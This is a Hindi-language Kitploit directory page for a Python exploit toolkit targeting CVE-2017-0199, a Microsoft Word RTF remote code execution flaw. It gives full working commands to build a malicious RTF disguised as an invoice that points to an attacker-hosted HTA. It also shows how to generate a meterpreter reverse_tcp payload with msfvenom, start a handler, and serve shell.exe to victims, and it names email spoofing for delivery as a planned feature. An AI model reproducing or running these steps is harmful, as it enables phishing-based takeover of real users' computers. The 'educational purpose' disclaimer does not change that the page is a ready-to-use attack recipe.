Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v2.0 एक उपयोगी python script है जो Microsoft RTF RCE का दोहन करने का एक त्वरित और प्रभावी तरीका प्रदान करता है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकता है और बिना किसी जटिल कॉन्फ़िगरेशन के victim को metasploit / meterpreter / कोई भी अन्य payload वितरित कर सकता है। | Kitploit
उपकरण/GitHubGitHub/exploit-install/cve-2017-0199
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubexploit-install/cve-2017-0199

CVE-2017-0199

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
7919 साल पहलेअभी तक समीक्षित नहीं

विवरण

Exploit toolkit CVE-2017-0199 - v2.0 एक उपयोगी python script है जो Microsoft RTF RCE का दोहन करने का एक त्वरित और प्रभावी तरीका प्रदान करता है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकता है और बिना किसी जटिल कॉन्फ़िगरेशन के victim को metasploit / meterpreter / कोई भी अन्य payload वितरित कर सकता है।

साझा करें

शोषण टूलकिट CVE-2017-0199 - v2.0

शोषण टूलकिट CVE-2017-0199 - v2.0 एक उपयोगी पायथन स्क्रिप्ट है जो Microsoft RTF RCE का शोषण करने का एक त्वरित और प्रभावी तरीका प्रदान करती है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकता है और किसी भी जटिल कॉन्फ़िगरेशन के बिना पीड़ित को मेटास्प्लॉइट / मीटरप्रेटर पेलोड प्रदान कर सकता है।

वीडियो ट्यूटोरियल

https://youtu.be/42LjG7bAvpg

रिलीज़ नोट:

स्क्रिप्ट में निम्नलिखित क्षमताएँ जोड़ी गईं

root@kitploit:~
- टूलकिट का उपयोग करके दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
- छोटे HTA + वेब सर्वर के रूप में शोषण मोड में टूलकिट चलाएं

संस्करण: पायथन संस्करण 2.7.13

भविष्य का रिलीज़:

निम्नलिखित सुविधा पर काम चल रहा है

root@kitploit:~
- ईमेल स्पूफिंग का उपयोग करके पीड़ित को उत्पन्न दुर्भावनापूर्ण RTF स्वचालित रूप से भेजें
	

उदाहरण:

  • चरण 1: निम्नलिखित कमांड का उपयोग करके दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें और इसे पीड़ित को भेजें

root@kitploit:~
  Syntax:

  # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

  Example:

  # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
  • चरण 2 (वैकल्पिक, यदि MSF पेलोड का उपयोग कर रहे हैं): मेटास्प्लॉइट पेलोड उत्पन्न करें और हैंडलर प्रारंभ करें

    root@kitploit:~
      Example:
    
      Generate Payload:
    
      # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    
      Start Handler:
    
      # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
    
  • चरण 3: पेलोड वितरित करने के लिए शोषण मोड में टूलकिट प्रारंभ करें

    root@kitploit:~
      Syntax:
    
      # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    
      Example:
    
      # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
    
  • कमांड लाइन तर्क:

    root@kitploit:~
    # python cve-2017-0199_toolkit.py -h
    
    This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
    
    Modes:
    
    -M gen                                          Generate Malicious RTF file only
    
         Generate malicious RTF file:
    
          -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).
    
          -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.
    
                                                 For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
    
                                                 will be requested once victim will open malicious RTF file.
    -M exp                                          Start exploitation mode
    
         Exploitation:
    
          -p <TCP port:Default 80>            Local port number.
    
          -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.
    
          -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
    

    अस्वीकरण

    यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (bhdresh) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूं। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस प्रोग्राम का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम से समझौता, आदि) bhdresh की जिम्मेदारी नहीं है।

    श्रेय

    @nixawk for RTF sample, @bhdresh

    बग, समस्याएँ, फीचर अनुरोध

    जाहिर है, मैं पूर्णकालिक डेवलपर नहीं हूं, इसलिए कुछ रुकावटों की उम्मीद करें

    कृपया बग, समस्याएँ [email protected] पर रिपोर्ट करें

    टूल डाउनलोड करें